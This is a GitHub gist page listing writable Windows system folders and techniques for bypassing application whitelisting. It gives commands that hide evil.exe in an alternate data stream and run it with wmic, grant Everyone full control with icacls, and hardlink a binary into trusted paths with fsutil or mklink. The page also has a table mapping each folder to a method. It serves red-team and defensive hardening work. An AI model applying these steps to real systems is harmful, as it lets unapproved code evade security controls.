Skip to content

Instantly share code, notes, and snippets.

@api0cradle
Last active September 4, 2023 22:25
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save api0cradle/563226464376d40e191ce53abcf9c4d0 to your computer and use it in GitHub Desktop.
Save api0cradle/563226464376d40e191ce53abcf9c4d0 to your computer and use it in GitHub Desktop.

c:\Windows\ccm\inventory\noidmifs
c:\Windows\ccm\logs
c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput

Create folder - Add ADS stream and execute == mkdir a folder in the path, do type evil.exe > newfolderinpath:evil.exe and wmic process call create 'newfolderinpath:evil.exe'

Take ownership - Add all rights - Drop and execute == Take ownership of folder, add all NTFS rights to your current user (icacls /grant:r Everyone:(OI)(CI)F /T) and then place binary file inside folder and execute.

Hardlink fsutil/mklink == Place evil.exe in user controlled folder (c:\myfolder) where you have execute rights. Do: fsutil hardlink create Folder\run.exe c:\myfolder\evil.exe. Execute run.exe. mklink /H folder\run.exe c:\myfolder\evil.exe works also...

Drop and execute == Just copy the binary into the folder and execute it.

Folder Bypass Access
C:\Windows\Tasks Drop and execute RW
C:\Windows\Temp Drop and execute RW
C:\Windows\tracing Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute RW
C:\Windows\Registration\CRMLog Hardlink fsutil/mklink RW
C:\Windows\System32\FxsTmp Hardlink fsutil/mklink RW
C:\Windows\System32\com\dmp Hardlink fsutil/mklink W
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys Drop and execute RW
C:\Windows\System32\spool\PRINTERS Hardlink fsutil/mklink W
C:\Windows\System32\spool\SERVERS Hardlink fsutil/mklink W
C:\Windows\System32\spool\drivers\color Drop and execute RW
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute RW
C:\Windows\SysWOW64\FxsTmp Hardlink fsutil/mklink RW
C:\Windows\SysWOW64\com\dmp Hardlink fsutil/mklink W
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute RW
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System Drop and execute RW
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment